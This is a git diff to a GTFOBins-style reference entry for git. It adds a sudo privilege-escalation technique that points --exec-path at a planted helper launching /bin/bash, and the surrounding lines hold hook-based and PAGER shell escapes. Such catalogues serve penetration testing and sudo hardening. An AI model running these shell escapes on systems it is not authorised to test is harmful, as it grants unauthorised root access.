diff --git a/_gtfobins/git.md b/_gtfobins/git.md
index 89a64bb..737b780 100644
--- a/_gtfobins/git.md
+++ b/_gtfobins/git.md
@@ -35,6 +35,12 @@ functions:
         echo 'exec /bin/sh 0<&2 1>&2' >"$TF/.git/hooks/pre-commit.sample"
         mv "$TF/.git/hooks/pre-commit.sample" "$TF/.git/hooks/pre-commit"
         sudo git -C "$TF" commit --allow-empty -m x
+    - description: If file creation is allowed, it can be used to change Git path
+      code: |
+        mkdir /tmp/git
+        echo '/bin/bash' > /tmp/git/git-escalation
+        chmod +x /tmp/git/git-escalation
+        sudo git --exec-path=/tmp/git escalation
   limited-suid:
     - code: PAGER='sh -c "exec sh 0<&1"' ./git -p help
 ---